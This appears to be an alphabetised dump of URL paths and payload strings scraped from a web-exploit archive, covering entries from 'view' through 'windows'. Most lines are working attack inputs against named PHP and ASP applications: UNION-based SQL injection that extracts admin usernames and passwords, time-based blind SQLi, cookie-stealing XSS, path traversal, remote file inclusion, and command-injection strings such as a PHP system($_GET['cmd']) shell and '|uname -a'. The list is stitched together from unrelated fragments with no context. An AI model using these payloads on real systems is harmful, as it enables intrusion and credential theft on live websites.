view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
view_item.php?ItemID='+uNioN+sElE
ViewItem.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_admin
ViewItem.php?ItemID='+union+select+1,2,3,4,concat(username,char(58),password,char(58),email),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_users+where+UserID=[UserID]
ViewItem.php?ItemNum=[SQL] 
/?view=itemslist&catid=[sqli]
view_items.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c666f6e7420636f6c6f723d22726564223e4845524520494e4a454354494f4e3c2f666f6e743e,12,13,14,15,16,17,18--
view_items.php?id=-null+union+select
viewjokes.php?id=5+and+(select 1)=1--
/?view=[LFI]
viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--
viewListing.php?listID=[SQL]
/?view=LivreDor&fiche=..
ViewLogMessagePage.class.php?base_path=[evil_scripts]
view_l.php?gfplugins=[Shell]
view_mags.php?cat_id=-1
view_mags.php?cat_id=-21+union+select+concat(user_name,0x3a,password)+from+members
viewmail.php?activepage=details&qid=w3jYVc7V3LFF&rid=87%27%20order%20by%2015--
view_member.php?username=..
viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,email,password,0,0%20FROM%20admin_users%20WHERE%20id=1
viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'
viewmessage.php?myprefs[language]}=[EV!L]
viewmessage.php?threadID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL FROM users%23
view_messages.php?row_y5_site_configuration[templates_folder]=[EV!L]
view_more.php?id=1'
view_m.php?gfplugins=[Shell]
view_m.php?id=additional sql command
viewmsg.php?msg_id=' union select 0,0,0,concat(username,char(54),user_password),0,0 from members--
view.music.php?id='+union+select+1,2,3,version(),5,6,7,8
viewnews.asp?id=[sqli]
view_news.php?id=-117+union+select+1,2,3,password,5,6,7,8,9+from+ardabil_ardabil_iec.users--
view_news.php?id=-117+union+select+1,2,3,userid,5,6,7,8,9+from+ardabil_ardabil_iec.userlog%20--
view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
view_news.php?news_id=-1
view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
view_news.php?nID=-3+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--
view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0
viewnews.php?nwsid=7(SQL)
viewnote.php?id=1812]
ViewOrderPage.class.php?base_path=[evil_scripts]
view_order.php?cat_id=1"><script>alert(document.cookie);<
view_order.php?product=1"><script>alert(document.cookie);<
view_order.php?session=1"><script>alert(document.cookie);<
view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F
viewpage.php?file=
view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202
view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0
viewphoto.asp?id=[sqli]
view_photo.php?page=3&alb=[SQLI]
*&view=photos
view.php
view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
view.php?addon_id=120
view.php?addon_id=146
view.php?arrange=[SQL]
view.php?articleid=14567'
view.php?articleid=-14567+union+select+all+1,2,3,version(),5,user(),7,8,9,10--
view.php?article_id=-1 UNION ALL SELECT 1,2,username,password,5,6,7,8,9 FROM comcms_users
view.php?blog=..
view.php?blog_id=[SQL]
view.php?category=-2+UNION+SELECT+1,concat(0x3a,Username,0x3a,Password),3+from+adminsettings--
view.php?cid=[SQLi]
view.php?Codebase=[Shell]
view.php?file=eaf47f8b92%27
view.php?file=fc99545574%27
view.php?file=SQL
view.php?gallery_id=[SQL] 
view.php?gid=1&phid=1&img_size=><script>alert('hi')<
view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C
view.php?group=4+and%20substring(@@version,1,1)=4
view.php?group=4+and%20substring(@@version,1,1)=5
view.php?id='
view.php?id=0002843
view.php?id=0002844
view.php?id=1'%22%3E%3Ciframe%3E
view.php?id=12607
view.php?id=12+and+1=0 False
view.php?id=12+and+1=0 True 
view.php?id=12+and+substring(@@version,1,1)=4 False
view.php?id=12+and+substring(@@version,1,1)=5 True
view.php?id=12+[BSQL]
view.php?id=12&thema=
view.php?id=-1337 union select
view.php?id=15898
view.php?id=16557
view.php?id=1737
view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+
view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
view.php?id=-1' union select 0,0,0,load_file('lf'),0,0,0--
view.php?id=-1+union+select+0x49276d2076756c6e657261626c65203a28,2,3,name,url,username,password,8,9,10+from+test_category&mytable=test_category
view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12
view.php?id=-1 union select 1,2,3,id,firstname,lastname,7,address,mobile,10,11,12,email,14 from addressbook
view.php?id=2607
view.php?id=2843
view.php?id=34
view.php?id=511
view.php?id=8
view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23
view.php?id=-99999
view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--
view.php?idArtikel=[SQL]
view.php?id=[html]
view.php?id=[SQL]
view.php?id=[SQL] 
view.php?id=[sqli]
view.php?id=[SQL Injection]
view.php?id=<SQL INJECTION>&mytable=test_category
view.php?inc=x 
view.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10+from+dd_admin
view.php?ItemID='+union+select+1,2,3,4,concat(username,char(58),password,char(58),email),6,7,8,9,10+from+dd_users+where+UserID=[UserID]
view.php?key=1 and     11=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
view.php?key=[BLIND]
view.php?key=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
view.php?key="><script>alert(document.cookie);<
view.php?key=[SQL]
view.php?l=default&id=3'%20OR%20'a'='a'
view.php?l=default&id=3%3Cscript%3Ealert();%3C
view.php?l=&id=00001<script>alert(document.cookie);<
view.php?offset=[SQL]
view.php?PG=test 
view.php?PID=[sqli]
view.php?p=Invest                                                ¦       ¦                                       ¦
view.php?prod=2'
view.php?prod=[SQL]
view.php?propID=0&INC= [ S H E L L ] ?
view.php?p=[SQL] 
view.php?qID=-9999')
view.php?qID=[SQL Injection]
view.php?s=advanced&query=&cat=-99%20UNION%20SELECT%2031337,0,0,0,password%20FROM%20ticket_reps%20WHERE%20ID=5
view.php?show_today=1<
view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(version())),16--
view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
view.php?storyid=-1' UNION ALL SELECT
view.php?ticketid=1'&ticket_pass= 
view.php?tid=-99'%20UNION%20SELECT%200,0,0,
view.php?topic=..
view.php?user_id=1%20union%20select%20user(),2,3,4
view.php?v=-9+union+select+1,2,3,4,5,4,7,UserName,Password,10,11,12+FROM+userinfo--
view.php?view=..
view.php?xroot=1267.0&cat=exploits
view.php=XX -o XX.out
view.picture.php?id='+union+select+1,user(),3,4,5,6,7
viewplan.php?customerPlanID=[SQL]
view_players.php
view_post.php?post_id=[SQL]
view_private.php?start=252&action=edit&tmp_theme=LFI
ViewProductPage.class.php?base_path=[evil_scripts]
view_product.php?cat_id=-1
view_product.php?product=' 
view_product.php?product=1"><script>alert(document.cookie);<
view_product.php?product=%27
view_product.php?product=3D94746%20AND%20%28SEL=
view_product.php?product=3D[SQL INJECTION]
view_products_cat.php?cat_id=-1
viewprofile?&partyId=aa"
viewprofile?partyId=aa"
viewprofile.php
viewprofile.php?id=999%20union%20select%201,2,3,4,5,6,7
view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271
viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
viewprofile.php?user=..
viewprofile.php?userID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23
viewprofil.php&membres=[variable-injection]
viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
view_prop_details.php?propid="><script>alert()<
viewpropertydetails.php?id=[id number][SQL]
viewrecipe.php?r_id=NULL
viewrecipe.php?r_id=[SQLi]
viewRelease
viewrequests.php
view_Results.php?id=[SQL] 
view_reviews.php?id=-1
view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
view_reviews.php?id=[SQL]
views
ViewSearch.html?integral=0&show_stop=0&show_resources=0&criteria=calendar_id%3D34&txtSearch=[code]
ViewSearch.html?integral=0&show_stop=0&show_resources=0&criteria=calendar_id%3D34&txtSearch=&opgFields1&opgSearch=[code]
ViewSearch.html?integral=0&show_stop=0&show_resources=0&criteria=calendar_id%3D34&txtSearch=&opgFields=[code]
views_edit_handler.php?gfplugins=[Shell]
views_edit.php?gfplugins=[Shell]
ViewServerPage.class.php?base_path=[evil_scripts]
viewshoutbox.php?error="><script>alert(document.cookie);<
view_snaps.php?type=2+and+substring(@@version,1,1)=4  ===> True
view_snaps.php?type=2+and+substring(@@version,1,1)=5  ===> False
viewsnatches.php?id=waraxe
viewsource.php?file=viewsource.php
views.php?dbs_base_path=[SHELL]
views.php?gfplugins=[Shell]
/?view=[sqli]
/?view=[Sqli]
views.queries.php?_SESSION[user_language]=[etc
viewStatement.php?start_date_date_month=03&start_date_date_day=01&start_date_date_year=2008&start_date_time_hour=12&start_date_time_min=00&start_date_time_amPm=AM&end_date_date_month=&end_date_date_day=&end_date_date_year=&end_date_time_hour=&end_date_time_min=&end_date_time_amPm=&_submit=&transactions_offset=[SQL]
viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20
viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20
view_sub_cat.php?cat_id=-1
 view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3
viewSupportTickets.asp?sortType='&sortOrder=ticketNum&page=0
+view&thread_id=-1 UNION ALL SELECT
viewthread.php?forum_id=10000&forum_cat=100000&thread_id=2 
viewthread.php?thread_id=20&highlight=%2527]);});alert(123);
viewthreads.php?boardID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)) FROM users%23
viewticket_details.php?ticket_id=338%22%3E%3Cif
viewticket_details.php?ticket_id=355[SQL_QUERY]
view_ticket.php?email=example@example.com&id=" onmouseover=alert(1) bad="
view_ticket.php?email=[Your Email]&id=1
viewtopic.php
viewtopic.php?bid=1&tid=310
viewtopic.php?cidReq=102&gidReq=&forum=1&0&forumview=threaded&topic=1[blind_sql_inject]
viewtopic&phpEx=..
viewtopic.php?f=14&t=267563
viewtopic.php?f=16&t=789
viewtopic.php?f=1&p=51700#p51700
viewtopic.php?f=25&t=69
viewtopic.php?f=2&t=6678
viewtopic.php?f=38&t=666
viewtopic.php?f=38&t=667
viewtopic.php?f=38&t=713
viewtopic.php?f=38&t=737
viewtopic.php?f=70&t=692625
viewtopic.php?f=8&t=4
viewtopic.php?forum=1&showtopic=1'0
viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull 
viewtopic.php&Forum=Forum%20de%20d?monstration.&msg=1103495330.dat&pgfull[variable-injection]
viewtopic.php?id=1436
viewtopic.php?id=19173
viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(document.cookie)%3C
viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23
viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C
viewtopic.php?id=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271
viewtopic.php?id=some_shit&t_id=2
view_topic.php' method="post">
viewtopic.php?p=3&highlight=\[]\ 
viewtopic.php?p=58834&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C
viewtopic.php\r\n";
viewtopic.php?t=112052
viewtopic.php?t=113826      *
viewtopic.php?t=13402
viewtopic.php?t=1653
viewtopic.php?t=180
viewtopic.php?t=239819
viewtopic.php?t=2643
viewtopic.php?t=26834
viewtopic.php?t=3"
viewtopic.php?t=30261
viewtopic.php?t=3501
viewtopic.php?t=389032
viewtopic.php?t=5108
viewtopic.php?t=517
view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202 
viewtopic.php?topic_id=14577&forum=2"><script>alert(document.cookie);<
viewtopic.php?topic_id=14577"><script>alert(document.cookie);<
view_t.php?gfplugins=[Shell]
viewusage.php?plan_id=[SQL]
view_user.php?list=1&letter=&sort_by='[SQL Injection] 
viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20
viewusers
viewvc
viewvc?rev=920369&view=rev
viewvc?rev=920370&view=rev
viewvc?rev=920371&view=rev
viewvc?rev=920372&view=rev
viewvc?rev=920379&view=rev
viewvc?rev=920380&view=rev
viewvc?rev=920381&view=rev
viewvc?rev=920382&view=rev
view.video.php?id='+union+select+1,2,3,user(),5,6,7,8
view_v.php?gfplugins=[Shell]
ViewWeek.html?year=2006&week=[code]
view_w.php?gfplugins=[Shell]
ViewYear.html?n=1&dropdown=1&integral=0&approved=1&show_stop=0&show_resources=0&calendar_id=[code]
ViewYear.html?n=1&dropdown=1&integral=0&approved=[code]
VIGILE_1.4
vigzsp.png
[Vikingboard_0.2_Beta]
vik-real-estate
vik-real-estate?vmcchk=1
violation.php3?Mod=address@to.spam&ForumName=text_to_spam
viraldx1
viralmarketing
viralmarketing.php
virtualpath
virtuemart
virtuemart112
virtuemart.net
VirtueMart-SQL-Injection-(SS-2011-003)
virtue_test_generator.php                      |
visa-zone-a-specialised-script-made-just-for-law-firm-dealing-in-visa.html
viscacha
visiblehookpoints
vis-intelligendi.co.cc
vis-intelligendi.co.cc\n".
vis-intelligendi.co.cc		\n";
vis-intelligendi.co.cc (search deluxebb)
vis-intelligendi.co.cc (search e-xooport)
visit
">Visit DomPHP Website
visitor
visitor&ip=[code]
Visitor-Logger
visitorsnow.php?activepeople=<script>alert(123);<
visitorstoday.php?todayactive=<script>alert(123);<
visitorupload.php?db_id=;phpinfo()
visit.php?cid=32&lid=1162
visit.php?id=-1[SQL]
visit.php?lid=1'1'0
visit.php?lid=131
visit.php?lid=2+DSecRG_INJECTION
visit.php?lid=3  1";
visit.php?lid=3 1";
vislog.php?_SERVER[%27PHP_SELF%27]=1&from=%3c%3f+system(%24_GET%5b%27cmd%27%5d)%3b+%3f%3e&root=..
Vistas
visualcaster
visualizza.php?plancia=..
visualizza_tabelle.php?id_sessione=&anno=2006&tipo_tabella=clienti
visualmx
visview.php? a=c&cid=2916852'% 20union%20select% 201,2,3,4,5, 6
visview.php?path_to_news=Command-Shell
vito-cms.php
[vittima]
vivvo.4.1.5.1
 [Vivvo Article Manager Path] 
vk-gallery
~vlad_l
vlad.tepesch.free.fr
vlandel.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]
vlanedit.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]
vlanview.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]
vlc_forum.php?action=affich_message&id=-999999
vlinks-v1.1.6.rar
VLO
vmenu.php?module=..
vmist.net
vnews
/?v=NXRG9xz403238%27+AND%200=if(substring(@@version,1,1)=4,benchmark(9999999,md5(@@version)),0)%23
/?v=NXRG9xz403238%27+AND%200=if(substring(@@version,1,1)=5,benchmark(9999999,md5(@@version)),0)%23
voc
voie.class.php?path_om=[Shell]
voipnow
voipnow.conf
voircom.php?id=[SQL CODE]                      #
voir_script_php_mysql-146.html
[voodoo_chat_dir]
vote',
votecode.php?lang=[LFI]
voteinclude.php
vote.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1
votesview.php?requestid=waraxe
voting.php?lang=[LFI]
votresite
vp
vphptree
v_profile.php?user[userid]='[SQL]
vrgpub
vr-gpub-3907.html                                                                                   
vrnews
vs
vscal
vScripts.php
vsftpd.chroot_list
vsp
vsp-core
/?v=[SQL]
vT0FaOCySSH
vtiger%20CRM%205.0.4%20
vtiger%20CRM%205.1.0
vtiger%20CRM%205.4.0
vtigercrm
vubb 1 administrator
vul
vuln
vulndev
vulnerabilities
vulnerabilities-in-php-nuke.html
vulnerability21.htm
Vulnerability-Lab
vulnerability.php
vulnerability_policy.pdf
vulnerability_policy.pdf 
<VULNERABLE
vulnerable_file.php?del=[SQLI]
[vulnerable_host]
vulnerable.plesk.smb.10.2.0.site:8880
vulnerable_server
vulnerable.site
 (Vulnerable Virtual Machine including Bitbot)
vulnerablewebsite
vulnerarable.plesk.smb.10.2.0.site:2006
[vuln file]?webmail2_inc_dir=[remote include]
vuln?id=11
vuln?id=12
vulnmeter
vulnpage.tld
vuln.php?page=..
vulns
[vuln_site]
[vulnWebSite]
vulpage.tld
vv3qczfC
vwar
VWar
[vwar_path]
[vwar_path]news.php?vwar_root=[Shell-code]?&cmd=ls
vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
vyc0d.uni.cc
vz
VZssGGYUkedWebLtksjudROM
)?([\w\.\-\_]*)(\
W
w00tz0ne.altervista.org
w00tz0ne.org
w3b
W3bDirScr2-nullscript.net.rar
w3c-synd
w3.php?nodeId=8348 and (select 1)=0 - will show an error page by aspect ratio Cms
w3.php?nodeId=8348 and (select 1)=1 - will show the page
w3.tbd.my :)
w4ndcE
w-agora
w-agora.net
[w-agora_path]
wait_son.php?gfwww=[Shell]
wakka.xiffy.nl
wallcity
wallpaper.php?wallpaperid=1%20UNION%20SELECT%20login,0,0,0,0,password%20FROM%20users%20
wanewsletter
wap
Wap4Joomla.html 
wapchat
wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
wap_short_news.php?path_simpnews=Command-Shell
waraxe
waraxe.jpg%00z
waraxe.us
ware_support
 [Ware Support_PATH] 
warez.gtasoft.ru
warlock.iblogger.org
warn.php?file=[SHELL]
war.php?showgame=[SQL]
war.php?sortby=[sql]
war.php?sortorder=[sql]
war.php?s=[SQL]
war.php?vwar_root=[Shell-code]?&cmd=ls
WaRWolFz
warwolfz.altervista.org
wascripts
wasen.net
wassup
watch
/?watch=1'
watch?feature=player_embedded&v=qnmalMrrUF4
watch?v=0lPz24Z7Q_4
watch?v=0rgInHvW8Ic
watch?v=1U4KKuqdoRg english 
watch?v=2aatog92oqU ]
watch?v=2NhaNFbyP_w
watch?v=6B3rND9S75g
watch?v=6kt-NU98GXU
watch?v=BhHpLicPcC0 
watch?v=BYrkuAN2ggI
watch?v=dBc7mK5iAH0
watch?v=d-ELnDPmI8w
watch?v=dX_PLimGeHk&flip=1 :P
watch?v=E78BGajeuAI&feature=related                                      #
watch?v=eSPp1dswe1E
watch?v=f7O6ekKOE9g
watch?v=fCRkJb8H2mQ italian 
watch?v=g70_JaKnBbw
watch?v=gKhicG4Aqek
watch?v=h3DQmJOkSY0
watch?v=i6D6UVR0358
watch?v=JxZcFArCeKs english 
watch?v=K3z7iyHttBw
watch?v=KXXALJUrdYM&fmt=18 (Low quality streaming)
watch?v=LprQDdZ6ZcU
watch?v=LZ8cG_sIHow
watch?v=Mlpve19l6_o
watch?v=O2y62xcUJ8E
watch?v=ON5waxZMnbo
watch?v=oVYrVcfA6Vo
watch?v=PWYh5254I4c
watch?v=S__l5IKzYNU
watch?v=SY1SwqLOC3c |
watch?v=TmFi2snLr7o
watch?v=tsLkL8DTHeg"
watch?v=txY52DTtFhQ italian
watch?v=uEK_Ah3htr0
watch?v=UjDm2p7qHj0
watch?v=uXN0pE2Hdt8
watch?v=WAkW1x_gSCw
watch?v=xCMlZxqZ5xI
water_profiles.add-edit.php
water_profiles.list.php
wavewoo
wavewoo.sourceforge.net
(\w+)\.([a-zA-Z])?
Wazzum
wb
Wb03ErMczAho
wb3
wb41
wbadmlog.aspx
wbb
wbb2
wbblite
wbblog.html
wbbook
".$wbbserver;
wbsearch.aspx (POST Method) [SQL]
wce.download.php?download=..
wcf
w.ch'onmouseover='document.getElementById(String.fromCharCode($WHERE)).value=this.innerHTML;document.getElementById(String.fromCharCode(112,117,98,108,105,115,104)).click();"
wcl.php?uniqueid=1;ls%20%3E%20
wcms
wcms-2.01
wcms-2.01_2
w-cms.info
w-cms.org
we
we.are.tridan.it
weatimages
web
".$web."
web1
web2
web-20-social-network-freunde-community.html
web2project-2.3
web3
web3news
web3news           
web4
webadmin
WebAdmin
web-applications
webapp.php?cat=phpDatingClub
webapps
webatall
webauction
webavis
webavis.myreseau.org
webbiblio
webbiblio.sourceforge.net
webboard
[webboard]
webboard.php?Category=[Category'name][SQL Injection]
webboard.php?Category=general'
webcaf
webcal
webCal3_detail.asp?event_id=20814+union+select+1,2,3,4,5,6,7,8,9,10+from+msysobjects
webcalendar
webcalendar-init.php?gfplugins=[Shell]
webcalendar.php |
webcalendar.sourceforge.net
webcards
webcat.sourceforge.net
webchamado
WebChamado
[web_chat]
WebChat
web.config
webcookbook
WebCookbook1.png
WebCookbook2.png
web-cp
webcreator.innoxia.cz
webdav
webdevindo
webdevindo-cms
[webdevindo_path]
webdev-webchat
web_directory_script.html
webedition
webEdition
webedition-cms-version-6102.html
webee
web-erp
webERP
webessence"
webfilebrowser
webFileBrowser.php?act=download&subdir=&sortby=name&file=..%2f..%2f..%2f..%2f..%2f[localfile] HTTP
webfileexplorer
webfolio-cms
webfoliocms-114-csrf-add-adminmodify.html
webfolio-cms.sourceforge.net
<webfolio_ip>:80
webforum
webfwlog.sourceforge.net
web-gateway
webgraf.ru
webgrind
webguerilla.net
webhost
webhost.htm ]
[web hosting]
web-hosting-directory.html ]
web-hosting-directory-script.php
webid
[webid]
WeBid
WeBid%20v1.0.4
WeBid%20v1.0.5
WeBid%20v1.0.6
webify.ws
webjaxe
WebLeague
WebLink
weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user
weblink_cat_list.php?bcat_id=[N.A.S.T ]
weblink_cats.php?
Web Links
weblinks_script.html
weblog
weblog.add.php
weblogicnet.tgz 
weblog_posting.php?mode=quote&r=[SQL]&w=1
weblog.sgrim.us
weblog.shtml
weblosning.html
webmaidcms
webmail
webmail2
webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change 
webmailhost:32000
webmaster
webm_stats.php?process=webm_login&webm_email=indoushka@hotmail.com&webm_password="+onmouseover=alert(213771818860)+
webm_stats.php?process=webm_login&webm_email=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B<
web-news
web.nvd.nist.gov
web.opendock.net
weboptimizer
weborganizer
webpa
".$webpage.$directory."index.php?filter=-1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--";
".$webpage.$directory."index.php?mod=files&action=view&where=-1+UNION+";
".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
web_page_name">
/?[Web Page]&nr=[SQL Injection]
webpages
webpagetest
webportal
webportal-0.8-beta
webprojectdb
[WebprojectDB_path]
webquest
webrcsdiff
webrepairdoctor.co.uk
webring
web-script-bug
webscripts
web_scripts_online_email_manager.phps
web_scripts_online_guestbook_pro.php
websearchengine
websec.science.uva.nl
Websecurity
websecuritynews
websecurity.ro                                                 
[ webserver IP][:port]
webservices
webshell.php>
webshell.php and see your webshell.
webshit] [ID]                              ="
webshop
WebShop
webshopir
web-shop_standard
web-shop_standard]
website
[website]
web_site
WEBSITE
websiteadmin_admin_users
websitebaker
website-faq
web-site-firewall-overview.php)
websitekit.us
website.net
website-page.php?pageId=[Code]
website.php?id=
website.php?template=..
website.php?template=<script>alert(document.cookie)<
websitesecurity
web-sites.kiev.ua
webslider
websoft.php?action=websoft_page_five
webspell
webspell4.01.02
webspot
[Webspotblogging_path]
web_statsConfig.php?mod_dir=[Evil_Script]
web_statsConfig.php?php_ext=[Evil_Script]
websvn.tigris.org
webtemp
webtemplatesoftware.html
web_test
webtools
webxadmin.free.fr
WebXakep.net
webxell
webxelleditor
[webxell_path]
web.xxx 
weEcondaImplement.inc.php?we_objectID=&shop_artikelid=%27;alert%280%29;
week1
week_details.php?gfplugins=[Shell]
week.php?eventinfo=<script>alert(document.cookie)<
week.php?font="><script>alert('LOL')<
week.php?gfplugins=[Shell]
week.php?user="><script>alert(document.cookie)<
weekview.php?idroom=-999
weight-loss-recipe-book.html
welcome
welcome#comments")
WelcomeEmailPage.class.php?base_path=[evil_scripts]
welcome.php?custom_welcome_page=..
welcome.php?id=3 and 1=1
welcome.php?id=3 and 1=2
welcome.php?id=3 and substring(@@version,1,1)=4
welcome.php?id=3 and substring(@@version,1,1)=5
welcome.php?id=3 [bSQL]
welcome.php?_LIB_DIR=[evil_code]
welcome to our priv8 exploits shop, greetz to all it's members
we_modules
wesbpell.org                             | enjoy your aids |
wespajuris_v3_0_2012.rar 
weTracking
wfsection
wgcc.de
wget.php?action=image&movie=1" method="post">
/?what=score&univers=[SQL]
whats-new
whcms.burolaga.nl
where
wHERe
 <--- Where ?
WHERE
where%20admin_id=1
where+id=1
where.the.bad.php.file.is
where.to
), which standardizes names for
white-label-cms
whitepaper_httpresponse.pdf
whizzy
whk_fallas-criticas-en-seo4smf-para-foros-smf-simplemachines-forum.html
whmcs
whmcs-dev
whmcs-modules
whois
whoiscart
whoiscart.net                                                     |
whoiscart.net #
whoisonline.php
whois.php?query=|uname -a
whois?whois_nic=" & site & "&type=domain"
wholesale
who.php
who_r.php?bj=[evilcode]
wichtiges-security-update-fur-alle-xtc-forks
wiclear-0.10.tgz
wiclear.free.fr
widged
_widged.php?A=U&D=
widget
widget.dokumenti_lista.php
widget.dokumenti_lista.php?config=alert(1);&bl=porackakupuvac&framenum=1
widgets
widgets.php?action=get_widget&id=%27%20OR%201=%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2b1%29%2%29%29%29%20--%20
widget_spider_calendar.php
" width=1000 height=1000><
wiki
Wiki
wiki:dokuwiki
WikiGroupSearchEngine.class.php?gfwww=[Shell]
WikiGroupSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
WikiHtmlSearchRenderer.class.php?gfwww=[Shell]
WikiHtmlSearchRenderer.class.php?GLOBALS[gfwww]=[Shell]
wiki.particlesoft.net
wikipedia
wiki.php
Wiki.php?c_node[class_path]=[evil_scripts]
WikiSandBox?action=AttachFile" % target, cookies=jar).text
WikiSandBox?action=moinexec&c=[command]" % target
WikiSandBox?action=twikidraw&do=modify&target=..
WikiSandBox?action=twikidraw&do=save&ticket=%s&target=..
WikiSandBox" % target).text
WikiSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
WikiSearchQuery.class.php?gfcommon=[Shell]
WikiSearchQuery.class.php?GLOBALS[gfcommon]=[Shell]
wiki.splitbrain.org
wiki.tlapicka.net
wiki_up
wiki.vi5.org
wikiwebhelp.org
wikiwig5.01
wikiwig.sourceforge.net
[wikiwig-V4.1]
wiki.xivo.fr
wikka
wikka.config.php
wikkawiki.org
Wiky
wili-cms
wili-cms.sourceforge.net
  ( Will be back soon)  								
 will display a 
williamshost
win
window.php?action=Shell.php
window.php?target=
windows
WINDOWS
windows-live
